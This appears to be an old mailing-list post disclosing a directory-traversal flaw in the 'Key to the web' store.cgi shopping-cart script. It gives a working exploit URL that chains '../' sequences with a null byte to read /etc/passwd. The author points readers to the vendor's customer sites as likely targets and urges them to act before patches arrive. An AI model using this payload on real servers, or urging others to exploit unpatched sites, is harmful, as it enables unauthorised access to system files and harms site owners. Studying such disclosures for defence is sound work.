Hi conrades: I write about a vulnerability in /cgi-bin/Store/store.cgi <-- This is part of a software that Key to the web (http://www.keyweb.com) use for her "e-comerce solutions". In her page you can find a list of posible webs with this vulnerability (but you must be faster becouse can be early patched :). The description about this vulnerability is the next: Name: Key to the web cgi-bin/Store/store.cgi "Show files" vulnerability. Problem: Adding the string "/../%00" will allow an remote attacker to be able to view any files on the server. Exploit: http://www.victim.com/cgi- bin/Store/store.cgi?product=../../../../../../../../../etc/passwd%00 by: _TacK_ (TacK@ole.com) Un saludo para la peņa del irc-hispano !!!!!!! Salud y (A)!!!!!!!!